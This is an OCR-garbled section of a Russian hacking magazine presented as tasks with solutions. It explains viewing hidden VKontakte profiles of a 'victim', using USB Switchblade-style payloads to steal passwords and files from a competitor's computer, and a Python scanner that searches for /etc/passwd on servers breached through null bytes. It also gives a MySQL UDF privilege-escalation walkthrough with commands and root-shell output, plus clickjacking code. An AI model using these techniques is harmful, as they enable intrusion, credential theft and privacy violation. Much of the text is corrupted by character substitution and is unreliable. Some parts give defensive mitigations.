профилей ѵѵѵѵѵѵ.ѵкопіакіе.ги - Что и говорить, возможность скрыть свои 
данные безусловно нужна, воттолько не хочется, чтобы ей пользовались 
интересующие нас юзеры :).Такилииначе, сейчас мы подробно опишем 
алгоритм действий по просмотру закрытых страничек. Кстати, сама такая 
возможность существовала уже давно. Суть ее заключалась в просмотре 
скрытого содержимого чужого аккаунта с прямым обращением кскрип- 
там ресурса и подстановкой нужного Ю юзера. Со временем нашлись 
добрые люди, которые собрали всю схему в одно целое и открыли 
бесплатный сервис — Ыір://піаЬСсІооппда1е.ги/ѵкоп1ак1е. С его помощью 
ты без труда можешь просмотреть содержимое скрытого профиля. Нужно 
лишь выполнить ряд простых действий. 

1 . Заходим на ѵкопіакіе.ги и ищем человека, профиль которого нам 
интересен. 

2. Теперь необходимо определить Ю жертвы. Делается это при обработке 
результатов поиска. Наводим мышкой на линк«Друзья имя_человека» и 
в статусной строке смотрим значение параметра «іб». 



3. Заходим по ссылке Ьир://підЫ:.бооппдаІ:е.ги/ѵкопІ:акІ:е. 

4 . В поле «Введите іб пользователя» вбиваем значение полученного 
ранее Ю и жмем соответствующую кнопку. 

5 . Получаем ряд ссылокна данные юзера: 

• Фото, где отмечен этот человек 

• Его фотоальбомы 

• Обзор фотографий 

• Его видеозаписи 

• Его аудиозаписи 

• Его заметки 

• Друзья этого человека 

• Последние статусы 

• Мнения других людей об этом человеке 

• Группы, в которых состоит этот человек 

• Рейтинг 

• Приложения, которые он использует 

• Вопросы, которые задал этот человек 

• Его события (встречи) 

6. Кликнув по выбранномулинку — переходим к соответствующему 
скрипту на ѵѵѵѵѵѵ.ѵкопіакіе.ги с интересующим нас Ю и содержимым. 
Справедливости ради стоит отметить, что есть аналогичная утила под назва- 
нием «Ѵгагѵебке». Что использовать — решатьтебе, большой разницы нет. 
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Перейдем к режиму невидимости. В отличие от«Одноклассников», 

«В Контакте» нетэтой функции, но отчаиваться не стоит. Чтобы твой 
статус не отображался как«0пИпе», тебе нужно просто не обращаться 
кскрипту ргобіе.рбр и не переходить на страницу «Моя страница». 
Будучи незаметным для широкого круга пользователей, ты сможешь 
смотреть фото/видео, оставлять комменты на стенах и читать приват- 
ные сообщения :). 

Прим, редактора: существует и другой способ просмотра интересующих 
тебя пользователей Ѵкопіакіе в режиме невидимости. Как утверждает- 
ся, способ работаеттолько в Рігеіох и сводится к простому алгоритму: 

1 . Открываем РігеЬх. 

2. В адресной строке вводим аЬоиРсопбд, — откроются все настройки 
браузера. 

3. В поле РКег вводим пеіѵѵогк.бир.гесіігесбоп-ііппіі:. 

4 . Внизу появится только этот параметр, меняем егозначение на О (тем 
самым мы запрещаем обрабатывать переадресации). 

5 . Открываем новую вкладку (Оігі+Т), грузим страницу входа Щір:// 
ѵкопІакІе.ги/Іодіп.рЬр и логинимся на сервер. 

6. Вылезетошибка, нотаки должно быть. 



№3 



ІАДАЧА: 



ПРЕДУСТАНОВЛЕННУЮ ѴѴІЫ00ѴѴ5ѴГ5ТА 
РЕШЕНИЕ: 

Увы, на большинстве современных ноутов, находящихся в продаже, 
предустановлена Виста. Кому-то она нравится, кому-то нет, пожелание 
оптимизировать осьестьу всех :). Этим мы и займемся, но прежде разо- 
бьем весь процесс оптимизации на несколько этапов: 

1 . Оптимизация загрузки ОС 
2 . Отключение неиспользуемых служб 
3 . Управление фоновой дефрагментацией 
4 . Отключение неиспользуемых устройств 
5 . Ускорение открытия меню Пуск/Збагб 

Итак, начнем с загрузки. Ситуация здесь напоминаетХР, поэтому можешь 
смело вычищать каталог«Автозагрузка», атакже ненужные ключи из 
реестра. Существует довольно много специализированныхутил по чистке 
системы, так что на этом этапе проблем возникнуть не должно. А вотс 
отключением неиспользуемых служб все намного интересней :]. Для 
примера приведу несколько служб, которыеты можешь безболезненно 
отключить в своей Висте: 

1 . Шінбоѵ^з Вебенбег — системная утила для обнаружения 
вредоносного ПО. Если стоит приличного вида антивирь 
— смело отключаем. 

2 . Сотрибег Вгоѵ\?зег/0бозреватель компьютеров — систем- 
ная служба, отвечающая за составление текущего списка 
компьютеров в Сети, используется для просмотра сетевых 
доменов и ресурсов. Если у тебя нет локалки, либо ты го- 
тов пожертвовать функциональностью в обмен на производи- 
тельность — отключаем. 

3 . Шінбоѵ73 Ербабе — системная служба обновления ОС. При 
наличии кривых заплаток от мелкомягких рекомендуется 
ставить все обновления вручную. 

4 . Шінбоѵ^з Еггог Керогбінд Зегѵісе/Служба отчетов об 
ошибках — системная служба регистрации ошибок служб/ 
приложений. Если тебе еще со времен ХР успело надоесть 
регулярно вылетающее после сбоя какого-либо приложения 
окно с предложением отправить отчет — однозначно отклю- 
чаем : ) . 



7 . Идем на какую-нить другую страницу, например, Ы:І:р://ѵкопІ:ак1:е. 
гиЛгіепсІ.рЬр - 

8. Возвращаемся во вкладку с настройками и меняем значение пара- 
метра на дефолтное (значение 20). 

Теперьты в сети, но в инвизе. Обходи ссылки с ргобіе.рбр и будешь 
всегда невидим для друзей. 

Сервис просмотра скрытых профилей «В Контактен! 




5 . Ргінб Зрооіег/Диспетчер очереди печати — системный 
диспетчер очереди печати. Если нет принтера — отключаем, 
появится — включим. 

б . Зесигібу Сенбег/Центр безопасности — системная утила, на- 
блюдающая за настройками безопасности ОС . При наличии пр5імых 
рук, установленного антивируса и настроенного фаера стано- 
вится полностью бесполезной . Как результат — отключаем . 

Списокможешь расширить на своеусмотрение :). 

Какты знаешь, в Висте реализована возможность фоновой дефрагмен- 
тации дисков. Для просмотра информации по настройкам/расписанию 
дефрагментации используй команду «беігад». Если не ошибаюсь, по 
дефолту ОС проводит дефрагментацию еженедельно по средам. Подроб- 
но останавливаться на отключении неиспользуемыхустройств не буду 
— здесь все просто: юзаем — нетрогаем, не юзаем — отрубаем. Путем 
недолгих экспериментов можно понять, что используется, а что — нет. 
Сускорением открытия меню «Пуск» все еще легче! Обращаемся 
креестру, а именно — к ветке «НКЕУ_С0ВВЕМТ_05ЕВ ^ Сопігоі 
РапеЮезкЬр». Находим ключ с названием «МепиЭбоѵѵВеІау» и убираем 
задержку, заменив дефолтовое значение «400» на «0». Кстати, при 
работе с реестром не забывай одно из основных правил: неуверен — не 
изменяй! Совершенству нет предела и процессом оптимизации можно 
заниматься бесконечно. Неувлекайся :). 



Оптимизируем Висту 
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№4 



ІАДАЧА: 



ЭКСПЛУАТАЦИИ НУЛЬБАЙТА 
РЕШЕНИЕ: 

С виду задача тривиальна, но дело в том, что содержимое архивов про- 
изводится внутри браузера. И если уязвимость исполняется на уровне 
браузера — следует применить какие-либо программные средства для 
ее обработки. Сделать это можно с помощью любой качалки (ѵѵдеС сигі, 
Іе1:сЬ), поэтомутвои действия заключаются всего в двух шагах. 



1 . Фиксируй путь к файлу и выкачивай архив, например: 

ІіССр: //ЬозС .ги/(ііг1/(ііг2/(іігЗ/^і1е. Саг .дг%00 

ѵ\?деС : ѵ\?деС -О :Еі1е . гаг ІіССр : / /ІіозС . ги/сЗіг1/сЗіг2 /сЗігЗ / 

^ііе . Саг . дг%00 

2. Важно понимать, что в файле находится не только желаемый 
архив, но и куча стороннего НТМІ-кода, в пространстве которого 
содержится файл. Поэтому проделаем следующую операцию: вос- 
пользуемся каким-либо редактором кода и «урежем» все лишнее 
до заголовка файла. Не советую для этих целей использовать 
блокнот, — лучше взять какое-либо продвинутое средство вроде 
ВВЕОЗ. 



Работа с ВРЕВ более оперативна, чем с поіераб. Проверь это на практике! 





ЗАДАЧА 



I ПРОНИКНУВ В ОФИС КОНКУРЕНТОВ, СЛИТЬ ВСЕ ВАЖНЫЕ 
ФАЙЛЫ С ЧУЖОГО КОМПЬЮТЕРА НА ПОРТАТИВНЫЙ НОСИТЕЛЬ 
(НАПРИМЕР, ІРОО) 

РЕШЕНИЕ: 



Изучим софт, который поможете наших враждебных целях. 

• Ц5В5ууИсЬЫас1е [ ѵѵікі пак5.огд/\л/ікі/Ц5В ЗѵѵіІсЬЫабе ] — незамени- 
мое средство в боях на чужой территории. Другое популярное название 
тулзы — Накб П5В ВѵѵксЬЫасІе, но сути это не меняет. Это готовый проект, 
содержащий несколько пакетов для хардкорного пассграббинга и 
пентестинга: Витр 5АМ (название говорит само за себя — дам пит базу 
ЭесигкуАссоипІ: Мападег’а ѴѴіпбоѵѵз), ІЕ/ЕігеФх Раззѵѵогб бгаЬЬег (ворует 
закешированные пароли известного браузера), скрытый установщик 
ѴМС-сервиса, атакже некоторые удобные скрипты для добавления поль- 
зователей, контроля сетевой активности итакдалее. Кслову, списокэтот 
расширяется. На официальном сайте поставляется несколько вариаций 
(такназываемых«1:есЬпідие5»): 

1- Мах ^атадеТесЬпі^ие■ Просто вставляем флешку, обращаемся к кон- 
соли: «Х:\Воситеп1:5Ѵодб[е5» (где X — буква флеш-драйва) и дожидаемся 
создания текстовых файлов со всем содержимым. 

2.АтІ5ЬТесЬпідие. Для начала скачаем вредоносную «начинку» ( Ьак5. 
огд/геІеазез/ЗхОЗ/зѵѵксЬЫасІе/АМІЭНІ .0-раѵІоасІ.гаг ) и распакуем в 
кореньсвоей флешки. Дабы неделатьлишнихдействий,тамже, в корне, 
можно создать файл аиЬгип.іпк в котором прописать директиву на авто- 
загрузку: «ПзеАи1:оР[ау=1 ». Втыкаем и обращаемся к«Х:\0итр». 

• Что касается Іроб, — могу посоветовать программу аІіѵеіпіЬеогѵ.І ЮтЬ. 
сот/І Р0Р5ѴѴІТСН В ПАРЕ. 2 Ір . Установка предельно проста: распако- 
вываем и при подключении ккомпьютеру, обращаемся в корне Іроб’а к 
.ехе-файлу. Он запроситпароль. Набиваем «Ьакб», после чего установку 
можно считатьзавершенной. Подключаем плеер к компьютеру жертвы, 
делаем навигацию по нему и исполняем с ргодзФгЕЬаЕ Понеслось! Ждем 
немного и потом проверяем файл «Х:\іРоб_Сопбд\Ритр». 



• С остальными примочками можно ознакомиться здесь: ѵѵікі.Ьакб. 
огд/ѵѵікі/иЗВ 5ѵѵі1:сЬЫабе#Мах Ратаде ТесЬпідие . 

Коснусьтолько наиболее интересной, гремучей смеси — такназываемой 
БіІіѵгепіоп’зТесЬпідие- Она работает на ХР5Р 2, итуда собрано все, что 
только можно (граббер ключей и данныхдля авторизаций наѴѴіпбоѵѵз 
ѴѴігеІезз Хего Оопбдигабоп, пеісаі: и т.д.). Интереса ради, стоит ознако- 
миться и с программой ЕхеБсгірІ ( ЫсІе-ЫсІег.сот/оѵегѵіеѵѵ/Ы' У.ЫппІ ). 
которая позволяет без особых знаний сделать из почти любых известных 
расширений (.бар .ѵЬз .)з, ѴѴ5Е, ѴѴ5Н, НТА) исполняемый файл. Порой это 
можеточень пригодиться! 



РодеЦжание «вредоносного» пакета. Как видишь, ничего сложногД 
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ЗАДАЧА: 



ІНАИТИ НА ВЗЛОМАННОМ ПОСРЕДСТВОМ НУЛЬБАИТА 
СЕРВЕРЕ ИНТЕРЕСНЫЕ ФАЙЛЫ (КОНФИГИр ДАМПЫ БАЗ И Т.П.) 
РЕШЕНИЕ: 



При эксплуатации ІП, или нульбайтов, часто встает вопрос об обнару- 
жении каких-либо важных локальных файлов. На некоторых системах, 
вроде РгееВЗО, такая проблема отпадает сама собой, поскольку нуль- 
байтпредоставляетпофайловый листингдиректорий. Но что делать на 
других системах (СепЮ5, Ыпих), где подобные вещи приходится искать 
наугад? Можно воспользоваться простым скриптом, который будет скар- 
мливатьзадание на поискфайла (кпримеру, раззѵѵсі) и прогонятьего по 
всем возможным директориям с разной глубиной. Наиболее интересные 
фрагменты сценария привожу ниже, а полный код ищи на ОѴО: 



ітрогС зуз , ІтССрІіЬ, иг11іЬ2 , зоскеС , Сіте, ге 

# шаблоном можно задать поиск конкретной строки, на- 
пример, в файле /еСс/раззеб 

Зеагск = "гооС : " 

#ѴегЬозе Мобе Оп = 1 
ѴегЬозе = О 

# заветный список путей для сканирования 

ѵиіпз = "кССр : / /раскеСзСогтзесигіСу . огд/ Пиззег/ 
бігТгаѵегзаІ . СхС " 

# интервал ожидания 
ТТ]Я = "2" 

беб таіп(]тозЦ, раСк) : 
к = кССрІіЬ . НТТР (козС ) 
к.риСгедиезС ( "НЕАВ" , раСк) 
к.риСкеабег ( "НозС " , козС) 
к. епбкеабегз ( ) 

окгезр, геазоп, кеабегз = к.деСгер1у() 






НовС : Ыад . ІіЬго .со С 

Рііа; 

ЕсогсЬ: госЬ: 

Т іпй Іо ыаіо: 1 оесйпЛв 

МісгозоСі'^1 1 3/6 .0 
В :і Э[Э2: РйипЛ. 

РаіЬ? Іжсій(1с4: 87? 
иок^Ьйое Ио4Ій ОГР 



-1 Росвімесі Егрог: НТТР Ергог 4В4і Кос Рошкі 

-1 Реоаіоеіі НТ1Р 4В4; Нас Раипіі 

-1 йсссіѵегі Ёггог: НТІР Еггог 4&4: Но С Роипіі 

-1 йесвіѵеіі Еі'і'оі*: НТТР Еггві* 4®4: Но С РоипА 



Автоматизированный подборе прогресс§| 



геСигп окгезр, геазоп, кеабегз . деС (" Зегѵег" ) 
беб деСзоигсе (Ііпе) : 

Сгу : 

зоигсе = иг11іЬ2 .игіореп ( "кССр: // "+1іпе) . геаб ( ) 
іб ѴегЬозе == 1 : 

ргіпС " Зоигсе :», Іеп ( зоигсе) 

іб ге . зеагск (Зеагск. 1оѵ\?ег ( ) , зоигсе . Іоѵ/ег ( ) ) \ 
! = Ыопе : 

ргіпС "\п[!] кРІ : " , Ііпе, "\п" 
ехсерС (иг11іЬ2 . НТТРЕггог , иг11іЬ2 . ІІЕЬЕггог ) , тзд: 
ргіпС " [-] Еесеіѵеб Еггог: " , тзд 
зоскеС . зеСбеПаиІССітеоиС ( 10 ) 

ргіпС "\п[+] НозС:",козС 

ргіпС " [ + ] Рі1е:",х 

ргіпС " [ + ] Зеагск Зеагск 

ргіпС " [ + ] Тіте Со ѵ/аіС : " , ТТ1л[, "зесопбз" 

ргіпС " [ + ] Зегѵег:", зегѵег 

ргіпС " [+] Еезропзе:", окгезр, геазоп 

ргіпС " [ + ] РаСкз коабеб: " , Іеп (раСкз) 

І1 ѴегЬозе == 1 : 

ргіпС " [ + ] ѴегЬозе Мобе Оп\п" 

еізе : 

ргіпС " [ + ] ѴегЬозе Мобе 011\п" 



№7 

альтернативным СПОСОБОМУЗНАТЬ ОС НАСЕТЕВОМ 

УРОВНЕ 

РЕШЕНИЕ: 

Представим, что стандартными средствами узнать инфу о системе не 
получается. Кпримеру, сканирование ММАРлегкосбитьстолку на системах 
с открытым исходным кодом. Что делать? Прибегнуть ктехн и ке пассивного 
фингерпринтинга? Открою секрет: его тоже можно обмануть (изменить 
опции следованияТСРОРТЮМЗ, изменить размеры окна, модифицировать 
ядра ОС итакдалее),хотьон иявляется наиболее актуальным и правдивым. 

У задачи нет однозначного ответа. Следует применить несколько разных 
по назначениюспособов. Вотспособ определения 00 поіеіпексервису: 

1. Скачиваем относительно новую утилиту Іеіпеігесоп [ сопприіес. 
сЬ/рго]ек1:еЛе[пе1:гесоп ]. позволяющую при открытом Іеіпексервисе (ТОР 
23) определить 00. 

2. После запуска видим, допустим, следующий АЗСІІ-вывод: 

255 - 253 - 37 - 255 - 251 - 255 - 251 - 255 - 253 - 92 - 39 - 255 - 253 - 255 - 253 - 255-251 

Это говоритоб отпечатке ѴѴіпбоѵѵзХР. 

3. СпецификациюТеІпеІ; можно найти вдокументе РРС854. Расшифровка 
ответа описывается примернотак: 

"255" — ІАС-ЬуСе 



"253" - ВО [0x61] 

"37" — Аиікепіісаііоп орСіоп (ЕРС 2941) 
"255" — ІАС-Ьуіе 
"251" - Шкк [ОхІЬ] 

Внешний вид интеДіфейса ТеІпеіРесопІ 
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АНДРЕЙ «ЗКѴ02» КОМАРОВ 


ЭКСПЛОЙТОВ 




ОБФУСКАЦИЯ СТАТУСБАРАВ М02ІІІА 
РІРЕРОХ («СІІСЮАСКІМС») 



»Вгіе^ 



Классификация атаки целиком и полностью относится к«спуфингу». 
С[іск]аскіпд, или так называемый «угон кликов» — относительно новая 
угроза со старым смыслом. Суть в следующем — юзеров обманом застав- 
ляют нажимать на невидимые элементы страниц в интернете (ссылки 
или диалоговые элементы), — что может вести к изменению правил 
безопасности на компьютере пользователя или кпосещению опасных 
веб-сайтов. Метод не нов, однако свежие исследования свидетельству- 
юто расширении программного обеспечения, в рамках которого пользо- 
ватель может стать жертвой сбск)аск1пд. К примеру, в список попали все 
современные средства, активно применяющиеся при серфинге в Сети: 
АбоЬе РІазЬ Ріауег, Іпіегпеі: ЕхрЬгег, Орега, Заіагі и Рігеіох. Сама вредо- 
носная функция, из-за которой поднялся весь шум, состоитиз мизерного 
количества строк: 

Тревога! Примерное такие ал ерты ты будешь получать от плагина Рігеіох] 
МоСсгірІ: при обнайдаении водоносных ^5-сценариевГ ' 



Щ 



іпзіаіі пож! 

СГёагсТіёС ѴѴагпТпд 



Роіепііаі СІкк^аскіпд / ІЛ КесІге55Іпд АПетрІ! 
МоЗсгірІ Ігт1:егсер1:е(і а глоизе ог кеуЬоагсі іпіегасішп ѵліЬ а 
рагііаі^ Ьісісіап еЕетепІ. СІіск оп іЬа ітаде Ьеіоѵ^іо сусіе 
Ьеаіъѵаеп іЬе оЬзІгис4е<і ашсі іЬе сіеагѵегзіоп. 



'х' 



Дігід !о Рігеіох -т. 

Ьіі р 3 ://а 6 СІОП з н т о2ІІ [а „ н .(і бопр 2 2/# і п зі: эі Р55 2 1 1 
Й Кѳер іЬіз еІвтеп4 1оске<1 Сгесотт^гиіесіІ) 

4Іок 



Моге іпЬ 



Наглядная демонстрация работы Х55Ріиегв ІЕД 




РипсСіоп ирсіаСеЬох (еѵС) { 

тоизеХ=еѵС .радеХ?еѵС .радеХ: еѵР . сІіепРХ; 

тоизеУ=еѵР . радеУРеѵР . радеУ : еѵР . сІіепРУ ; 

йоситепЦ . деРЕІетепРВуІсі ( ’тусііѵ' ) .зЦу1е.1еРЦ=тоизеХ-1; 

йоситепЦ . деРЕІетепРВуІсі ( ’тусііѵ' ) . зруіе . ■Ьор=тоизеУ-1 ; 

} 

Вызывается она через опсІіск=”ирба1;еЬох(еѵеп1:)”, — после чего осу- 
ществляется скрытый редирект на сторонний ресурс. Такая маскировка 
имеетместо и в других браузерах, например, Соодіе СЬготе. 



»ТагдеІ8;| 



Соодіе СЬготе 1 .0.1 54.43/Мо2іиа ЕігеІох3.0.5/ІЕ 7.0 



» Ехріоід 



Ьир://5ес[І5І5.ога/Ьиа1гад/2009/Зап/0268.Ыт[ 



»5оІиІіоп 



У браузера Еігеіох нет встроенных средств, которые помогли бы избежать 
этой напасти. Чтобы как-то обезопасить себя, пользователям предлага- 
ется установитьспециальный плагин МозсгірЕ В ІЕЗэтим занимается 
Х55Еіиег, но аналогов МоЗсгірІ; для других браузеров не существует. В 
Орега борьба с «кликджекингом» складывается следующим образом. 

Так как наиболее популярный метод его эксплуатации — это расстанов- 
ка Тгате’ов, хорошо бы их запретить. Делается это в «Инструменты 
Настройки ^ Дополнительно ^ Содержимое Настроить стили». В по- 
явившемся диалоговом окне необходимоубрать галку с пункта «Вклю- 
чить іпііпе-фреймы». Вводим в строке адреса орега:сопбд, ищем слово 
ІЕгатез и «Отключить элемент» (понадобится перезагрузка браузера). 




руіьоізсьоиРЕ 

ИСПОЛНЕНИЕ КОМАНД В МУ501 С ПО- 
МОЩЬЮ иор-функций 



» Вгіе^ 



Современные базы данных поражают функциональными широтами. Их 
сложностьсравнима с работой операционной системы или отдельного 
языка программирования. Любая база данныхтем или иным образом 
взаимодействуете операционной системой. 

В Му50Е можно создавать Озег-Вебпеб функции (ОВЕ) и с помощью них 
обращаться кокружению операционной системы, на которой эта база 
установлена. Такое «обращение» зачастую приводит к исполнению потен- 
циально опасных команд. Что и было продемонстрировано пару лет назад в 
боевом эксплоите для выполнения неавторизированного кода с использо- 
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ванием баз — гар1:ог_ис112.с [ ОхсІеасІЬеебіпІо/ехрІоіІз/гарЬг ис11'2.с. ]. 

В целом, эксплуатация сводилась к следующему: с какими-либо 
заданными привилегиями хакер имеет доступ к базе. Иным вариантом 
могло бытьдействие по загрузке уже заведомо скомпилированного 
вредоносного кода — в качестве динамически подключаемой библиоте- 
ки (буЬпатіс-Ііпк ИЬгагу — ѴѴіпбоѵѵз) или збагеб оЬ]ес1: (ипіх/Ыпих-Ііке) 
через [оаб_б1е на сайте, кпримеру, при использовании ЗОІ-іщесбоп. 
Рассмотрим ситуацию локального доступа: 

$ ісі 

иі(і=500 (гарЦог) дісі=500 (гарРог) дгоирз = 500 (гарРог ) 

# собираем эксплоит 

$ дсс -д -с гарРог_ибР.с 

$ дсс -д -зііагеб , -зопате , гарРог_ибР . зо -о гарРог_ 
ибР . 30 гарРог_ибР . о — 1с 

# лезем в базу, куда попытаемся засунуть динамическую 
библиотеку в формате . зо 

$ тузді -и гооР -р 
ЕпРег разз\л?огб: 

[. . .] 

# используем какую-либо базу, например, с именем 
«тузді» : 

тузд1> изе тузді; 

# создаем таблицу с хранящимися значениями в формате ЫоЬ 
тузд1> сгеаРе РаЫе Роо(1іпе ЫоЬ) ; 

# импорт библиотеки 

тузд1> іпзегР іпРо Роо ѵаіиез (1оаб_Рі1е( ' /Ьоте/гарРог/ 
гарРог_ибР . 30 ' ) ) ; 

# метод запуска «таіісіоиз» -функции 

пузд1> зеіеср * Ргот Роо іпРо бппррііе ' /изг/1іЬ/гарРог_ибР. зо ' ; 
тузд1> сгеаРе РипсРіоп бо_зузРет геРигпз іпРедег зопате 
' гарРог_ибР . 30 ' ; 
тузд1> зеІесР * Ргот тузді .Рипс; 



I пате I геР I Ы I Руре 



I бо_зузРет | 2 | гарРог_ибР . зо I РипсРіоп | 



тузд1> зеіеср бо_зузРет( ' іб > /Ртр/оиР; сЪ.оші гарРог. 
гарРог /Ртр/оиР ' ) ; 
тузд1> \ ! ЗЬ 
# полученный шелл 
зЬ-2.05Ь$ саР /Ртр/оиР 

иіб=0(гооР) діб=0(гооР) дгоирз = 0 (гооР) , 1 (Ып) , 2 (баетоп 
) , 3 (зуз) , 4 (абт) 

Одним из весомых ограничений является работа только с базами 
Му501 ниже пятой ветки и разрешенной возможностью подключать 
динамические библиотеки. Как писать та кие функции, можно узнать 
на ресурсе Ролана Баумана ( тѵздІибРогд І. Что касается нового 
метода повысить привилегии (с выполнением неавторизированно- 
го кода через базу), — для начала следует обратиться к библиотеке 
[іЬ_ту5д[ибі'_5у5 [ тѵздІибРогдДіЬ ппѵздіибі' зѵз/іпбех.рЬр) . которая пре- 
доставляет набор методов для непосредственного доступа к системе: 

зуз_ехес — исполнение произвольной команды ех системы 
зуз_деР — информация о получении переменной окружения 
зуз_зеР — создать или задать переменную окружения, обно- 
вить ее значение 



Весь юмор втом, что функции могутбыть использованы с базами Му501 
5.x. Важно помнить, что стандартный вывод предоставляет функция 
5уз_еѵа[, а не 5уз_ехес. Вторая возвращаеттолько код выполнения ко- 
манды — 1 или 0. Исходя из этих соображений, подключаемый «боевой 
код» в виде нового эксплоита содержит незначительно пропатченную 
иЬ_тузд[иб1'_зуз, в которой зуз_ехес заменена на зуз_еѵаІ. 

$ \л?деР --по-сЬеск-сегРіІісаРе ЬбСрз : //зѵп. здітар . огд/ 
зд1тар/Цгипк/зд1тар/ехЦга/тузд1иб1зуз/1іЬ_тузд1иб1_ 
зуз_0 .0.3. баг . дт. 

$ баг хб 2 1іЬ_тузд1ибб_зуз_0 . О . 3 . баг . дг 
$ сб 1іЬ_тузд1ибб_зуз_0 .0.3 
$ зибо ./іпзбаІІ.зЬ 
# собираем подключаемый модуль 

дсс -Шаіі -І/изг/іпс1ибе/тузд1 -I. — зЬагеб 1іЬ_ 
тузд1ибб_зуз . с -о /изг/1іЬ/1іЬ_тузд1ибб_зуз . зо 
МуЗСЬ иВР сотрііеб зиссеззбиііу 
$ тузді -и гооб -р тузді 
Епбег разз\л?огб: 

[. . .] 

тузд1> ЗЕЕЕСТ зуз_еѵа1 ( ' іб' ) ; 



I зуз_еѵа1 ( ' іб ' ) I 



I иіб=118 (тузді ) діб=12 8 (тузді ) дгоирз=12 8 (тузді ) I 



1 гоѵ^ іп зеб (0.02 зес) 

# попробуем что-нибудь натворить, например создать файл 
тузд1> ЗЕЕЕСТ зуз_ехес ( ’боисЬ /бтр/безб_тузд1 ' ) ; 



I зуз_ехес ( ' боисЬ /бтр/безб_тузд1 ' ) I 



I О I 



1 гоѵі іп зеб (0.02 зес) 

тузд1> ехіб 
Вуе 

$ 1з -1 /бтр/безб_тузд1 

— гѵ\?-гѵ^ 1 тузді тузді О 2009-01-16 23:18 /бтр/безб. 

тузді 



»ТагдеІ5| 



Му5015.0+ 



» Ехріоід 



Скачатьэксплоит можно на репозитории известной программы для 
проведения ВОІ-іщесбоп — зѵп.здІтар.ога/здІтарЛгипк/здІппар/ехІга/ 
ппѵздІисИ'зѵз/ . 



Процесс захвата машины с применением гарЬг) 
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соп^І5 оГ агмуілег пге щ 0 
ПіІБ ргоПІе аі \оаа 

Наі 

АЛсі а 5ііІ?^ргоТііе Іог Шк;: 
ртоі^е - саПесІ а Наі, ТІіІ5 
орі^гк 15 йпа^доі/5 (і> 
тапиаііу сгеоОлді а пеш 
рС'СкПв^ нИіс^ сап 
иіессей аигіпд ехесц(іоп 
олку іп &і« соп№хі оГ 
Реіпд а5ке(1 Гог Ьу й 
сиапоенаЦ 
арркІсаЦоп. Рог тоге 
кгіГоптаиоп ол онаік^епа^ 
ріеаге «ее пип 
сЬапреЬвІ оп уоиг 
5у5(ст ог те моѵеіі 
АррАгтог ілег'а Сиісіе. 

оеіене Епггу; 

Пешоѵеа те «еІесКесІ 
елігу Лот »Ь ргоГИе . 



АррАгтог Рго^Ме ОЕаІод 



АррАгтог ргоАіе Гог дізг/гЬіпушрскЗ-ргекЬгіс 



Рііе Nап1е 


1 РШГІІЁ5І0ПБ |',±| 


І+І '^/еггог/нпР_гаОТ_РОУКіРЛІііпі.ѵаг у 

[+] ^/ТлѵІсюгі.Іні 

[+] 

[+] 


[+] '‘/9і№БЦэоок/дие5ІЬооК.С5& 

[+] */дие5»оок/іпае>!^0р 

[+] Л0ЕРАІЛ.Т_ЦШ 

[+] ^нАліоинб_ишш$тЕо^(мрцт 

лг^сіисі^е йЬ5Іг«с1іап$/Ьа5е 

яіпіііігіір 


§ 

^ 



[ Ш Епту ^ I I ЕДСЕгйгу ] [ Реіе^еЕгИг^ 



[ Ерпе 



Возможности АррАгтог впечатляют. С ней можно даже заточить ѴѴЕВ-І 

Гервеіі 



А Га<аІ днсврНоп ѲЕ Ьае оссиггей аі: ѲѲ28:СѲѲІІЕЭ6 іп УХЕ ИГіИСеі) 
ееЭІвЕЗБ. ТІіе сиггѳпГ аррІісаГІол оіП Ьв Тѳгпкплі:ей. 

- Рге&к аіір ^(Ѳі^ (о іеггчігійіе іЬе спггппі аррИсаНоп. 

* Рг038 СТВЪ*ЙЪТ*ОЕІ ад^аіп іо гезіагі уо«г соприіег. Уои мПІ 

ІО 80 апр игі8аие4 іпГоглаііоп іп аіі аррисаііопз. 



іткчемуприводитошибка при отсутствии проверок на аномалии в| 
ІОСТЦ 



»5оІиІіоп 



Основное решение проблемы — запретитьзаписи в актуальные дирек- 
тории, куда хакер могбызалитьскомпилированный эксплоит. Проделать 
это можно расстановкой прав доступа, а также — применив специальные 
программные средства, вроде АррАгтог. Многие считают, что АррАгтог 
— это ѴѴЕВ-аррІісабоп файрвол. На самом деле, возможности его гораз- 
до шире, потому что основная задача проекта — внедрить дискрецион- 
ный доступ (ПАС) путем останова мандатов (МАО). Для каждого прило- 
жения можно создать свой профиль безопасности, в котором урезать 
многие вещи. Оцени разницу с включенным АррАгтог: 

зийо аррагтог_зЦаЦиз 

[. . .] 

1 ргосеззез Ііаѵе рго:Еі1ез сіеіЕіпесі. 

О ргосеззез аге іп епіогсе тосіе : 

0 ргосеззез аге іп сотріаіп тосіе. 

1 ргосеззез аге ипсопііпесі ЬиР Ііаѵе а ргоіііе сіеііпесі. 

/изг/зЬіп/тузрІсі (5128) 

$ тузрі -и гооР -р тузрі ЕпРег разз\л?огсі: 



О ргосеззез аге іп сотріаіп тосіе. 

0 ргосеззез аге ипсопііпесі ЬиР ііаѵе а ргоіііе сіеііпесі. 
$ тузрі -и гооР -р тузрі 

ЕпРег раззѵ\?ог(і: 

[. . .] 

тузр1> зеіеср зуз_еѵа1 ( ' ісі' ) ; 

+ 

1 зуз_еѵа1 ( ' ісі ' ) I 

+ 

I иісі=118 (тузрі) дісі=12 8 (тузрі ) дгоирз = 12 8 (тузрі ) I 

+ 

1 тоѵі іп зеР (0.02 зес) 

тузд1> зеіеср зуз_ехес ( ' ісі' ) ; 

+ + 

I зуз_ехес ( ' ісі ' ) I 

+ + 

I о I 

+ + 

1 тоѵі іп зеР (0.10 зес) 



тузд1> ЗЕЕЕСТ зуз_еѵа1 ( ' ісі' ) ; 

+ + 

I зуз_еѵа1 ( ' ісі ' ) I 



I I 



1 ГОѴ7 ІП зеР (0.12 зес) 

Тишина! 

тузд1> зеіеср зуз_ехес ( ' ісі' ) ; 

+ + 

I зуз_ехес ( ' ісі ' ) I 

+ + 

I 32512 I 



1 ГОѴ7 ІП зеР (0.01 зес) 

тузд1> ехіР 

Вуе 

# Работа с отключенным АррАгтог : 

$ зибо /еРс/іпіР . б/аррагтог зРор 
Ііпіоабіпд АррАгтог ргоРіІез : бопе . 
$ зибо аррагтог_зРаРиз 

[. . .] 

о ргосеззез баѵе ргоРіІез беРіпеб. 
о ргосеззез аге іп епРогсе тобе : 




ИСПОЛНЕНИЕ 

КОМАНД 

СР 05 Т 6 РЕ 50 Ьи 0 Р 



Ситуация с ООР повторяется в этом типе баз. Злоумышленник может 
создать злонамеренный вызов ООР и с его помощью исполнить на 
